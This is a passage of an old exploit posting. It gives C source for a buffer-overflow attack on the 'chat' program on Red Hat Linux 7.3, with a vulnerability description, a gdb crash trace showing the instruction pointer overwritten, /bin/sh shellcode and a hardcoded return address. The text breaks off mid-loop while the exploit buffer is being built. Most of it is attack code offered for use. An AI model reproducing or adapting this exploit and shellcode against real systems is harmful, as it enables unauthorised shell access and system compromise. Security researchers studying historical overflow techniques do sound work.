Chat Xploit by Polygrithm/Whackerz
/* *** Copyright (C) NrAziz * *** /usr/sbin/chat on Red Hat 7.3 * *** polygrithm@hotmail.com * *** Greets to my good friend (Rave)*(Mixter)/Mercy(remember helpforexe??)+(Gorny). */ /* ********************** VULNERABILITY ************************* * 1. Definition: * * The chat program defines a conversational exchange between * the computer and the modem. Its primary purpose is to * establish the connection between the Point-to-Point Proto- * col Daemon. * * 2. Detail: * There is a buffer overflow vulnerability in the chat program that can be * exploited by putting data more than 1052, will cause the buffer to over * flow. * * * 3. Detection: * The chat program on Linux 7.3 was found vulnerable, others not tested. * * [nraziz@nraziz codes]$ gdb /usr/sbin/chat * GNU gdb Red Hat Linux (5.1.90CVS-5) * Copyright 2002 Free Software Foundation, Inc. * GDB is free software, covered by the GNU General Public License, and you are * welcome to change it and/or distribute copies of it under certain conditions. * Type "show copying" to see the conditions. * There is absolutely no warranty for GDB. Type "show warranty" for details. * This GDB was configured as "i386-redhat-linux"... * (no debugging symbols found)... * (gdb) run `perl -e 'print "A" x 1056'` * Starting program: /usr/sbin/chat `perl -e 'print "A" x 1056'` * (no debugging symbols found)...(no debugging symbols found)... * Program received signal SIGSEGV, Segmentation fault. * 0x41414141 in ?? () * (gdb)info all * eax 0x804cc88 134532232 * ecx 0x0 0 * edx 0x422 1058 * ebx 0x41414141 1094795585 * esp 0xbffff290 0xbffff290 * ebp 0x41414141 0x41414141 * esi 0x41414141 1094795585 * edi 0x41414141 1094795585 * eip 0x41414141 0x41414141 <---------eip overwritten * ^^^ ^^^^^^^^^^ ^^^^^^^^^^ * **************************************************************** */ /* * Exploit Goes Here */ #include#include char shellcode[] = "\x31\xc0" /* xor %eax, %eax */ "\x50" /* push %eax */ "\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */ "\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */ "\x89\xe3" /* mov %esp,%ebx */ "\x50" /* push %eax */ "\x53" /* push %ebx */ "\x89\xe1" /* mov %esp,%ecx */ "\x31\xd2" /* xor %edx,%edx */ "\xb0\x0b" /* mov $0xb,%al */ "\xcd\x80"; /* int $0x80 */ #define BSIZE 1054 //#define RET 1056 /* * Both the RET works :) */ //#define RET 0xbffffa14 #define RET 0xbffff94c int main(int argc,char **argv) { int bsize=BSIZE; char *buffer; int i; unsigned long retaddr=RET; if(argc>1) bsize=atoi(argv[1]); buffer=(char *)malloc(sizeof(char)*bsize); fprintf(stderr,"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n"); fprintf(stderr,"chat Xploit for Linux 7.3 by NrAziz\n"); fprintf(stderr,"Using address:%p\n",retaddr); fprintf(stderr,"N R A Z I Z\n"); fprintf(stderr,"polygrithm @ hotmail.com\n"); fprintf(stderr,"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n"); for(i=0;i